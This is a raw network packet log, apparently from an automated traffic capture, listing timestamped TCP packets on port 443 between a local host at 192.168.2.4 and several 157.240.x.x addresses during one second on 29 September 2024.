                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.246460915 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.262759924 CEST44349793157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.287435055 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.325684071 CEST49788443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.328120947 CEST49793443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.372544050 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.376084089 CEST49792443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.379867077 CEST44349794157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.424736977 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.424815893 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.424829006 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.428162098 CEST44349795157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.435069084 CEST49794443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.476871967 CEST44349798157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.476875067 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.476984978 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.477005959 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.481370926 CEST44349788157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.481460094 CEST49788443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.481488943 CEST44349788157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.481590986 CEST44349788157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.481652021 CEST49788443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.481669903 CEST44349788157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.481786013 CEST44349799157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.481786966 CEST44349788157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.481847048 CEST49788443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.484838963 CEST44349800157.240.251.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.489995956 CEST44349797157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.494174957 CEST44349792157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.494251013 CEST49792443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.494267941 CEST44349792157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.505986929 CEST44349796157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.506442070 CEST44349792157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.506465912 CEST44349792157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.506485939 CEST44349792157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.506525993 CEST44349792157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.506525993 CEST49792443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.506561041 CEST44349792157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.506571054 CEST49792443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.506596088 CEST49792443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.511066914 CEST44349792157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.514137983 CEST49792443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.515202999 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.515261889 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.515281916 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.518758059 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.518765926 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.518790007 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.518800974 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.518812895 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.518822908 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.518832922 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.518863916 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.518908024 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.544449091 CEST49798443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.544452906 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.544452906 CEST49795443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.544452906 CEST49800443192.168.2.4157.240.251.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.547111034 CEST49797443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.554941893 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.554955959 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.554986954 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.554996967 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.555006981 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.555018902 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.555027962 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.555072069 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.566054106 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.566062927 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.566098928 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.566131115 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.566158056 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.566159010 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.566175938 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.566195965 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.566226959 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.566226959 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.585299969 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.585306883 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.585347891 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.585378885 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.585385084 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.585397005 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.585433960 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.585457087 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.600409031 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.600419044 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.600461006 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.600493908 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.600517035 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.600537062 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.600537062 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.600558043 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.600586891 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.600586891 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.600599051 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.600627899 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.607608080 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.607675076 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.607707024 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.607722044 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.607757092 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.607781887 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.626272917 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.626290083 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.626380920 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.626388073 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.626398087 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.626437902 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.626444101 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.626494884 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.629244089 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.629273891 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.629282951 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.629296064 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.629319906 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.629326105 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.629386902 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.637473106 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.637501955 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.637547970 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.637578964 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.637588024 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.637629032 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.637634039 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.637667894 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.638160944 CEST49799443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.638215065 CEST49796443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.652789116 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.652827978 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.652873993 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.652883053 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.652937889 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.665868044 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.665925026 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.665976048 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.665982008 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.666017056 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.666043997 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.668138027 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.668144941 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.668174028 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.668201923 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.668210030 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.668212891 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.668265104 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.668279886 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.668287039 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.668327093 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.678203106 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.678220987 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.678283930 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.678289890 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.692362070 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.692404032 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.692452908 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.692456961 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.692516088 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.700515985 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.700566053 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.700614929 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.700622082 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.700669050 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.700731039 CEST44349791157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.700782061 CEST49791443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.702065945 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.702090979 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.702128887 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.702133894 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.702178955 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.716547012 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.716562033 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.716640949 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.716646910 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.718893051 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.718923092 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.718961954 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.718969107 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.719017982 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.721091986 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.721148968 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.732866049 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.732898951 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.732937098 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.732945919 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.732995987 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.733486891 CEST49796443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.733527899 CEST44349796157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.734373093 CEST49797443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.734389067 CEST44349797157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.734710932 CEST49800443192.168.2.4157.240.251.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.734750032 CEST44349800157.240.251.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.734872103 CEST49799443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.734888077 CEST44349799157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.734890938 CEST44349796157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.734904051 CEST44349796157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.734963894 CEST49796443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.735524893 CEST49798443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.735538960 CEST44349798157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.735671997 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.735831022 CEST44349800157.240.251.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.735843897 CEST44349800157.240.251.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.735908985 CEST49800443192.168.2.4157.240.251.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.736186981 CEST49795443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.736203909 CEST44349795157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.736216068 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.736499071 CEST44349799157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.736511946 CEST44349799157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.736587048 CEST49799443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.736875057 CEST49794443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.736890078 CEST44349794157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.737044096 CEST49793443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.737055063 CEST44349793157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.737740993 CEST44349795157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.737761021 CEST44349795157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.737807989 CEST49795443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.737936974 CEST44349794157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.737943888 CEST44349798157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.737948895 CEST44349794157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.737968922 CEST44349798157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.738017082 CEST49794443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.738055944 CEST44349793157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.738065004 CEST44349793157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.738109112 CEST49798443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.738109112 CEST49793443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.738208055 CEST49796443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.738282919 CEST44349796157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.738343000 CEST44349797157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.738398075 CEST44349797157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.739857912 CEST49797443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.740091085 CEST49800443192.168.2.4157.240.251.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.740164042 CEST44349800157.240.251.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.741153955 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.741170883 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.741250992 CEST49790443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.741255999 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.741906881 CEST49799443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.741971016 CEST44349799157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.742486000 CEST49795443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.742619038 CEST44349795157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.743592978 CEST49798443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.743776083 CEST44349798157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.744297028 CEST49794443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.744355917 CEST44349794157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.745417118 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.745436907 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.745490074 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.745496035 CEST44349789157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.745558023 CEST49789443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.746269941 CEST49793443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.746325970 CEST44349793157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.748437881 CEST49797443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.748728991 CEST44349797157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.749119997 CEST49796443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.749136925 CEST44349796157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.749703884 CEST49800443192.168.2.4157.240.251.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.749716997 CEST44349800157.240.251.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.749799967 CEST49799443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.749813080 CEST44349799157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.750014067 CEST49795443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.750034094 CEST44349795157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.750293016 CEST49798443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.750312090 CEST44349798157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.750431061 CEST49794443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.750437975 CEST44349794157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.751072884 CEST49793443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.751082897 CEST44349793157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.751218081 CEST49797443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.751234055 CEST44349797157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.755466938 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.755481958 CEST44349790157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:21.755548954 CEST49790443192.168.2.4157.240.0.6
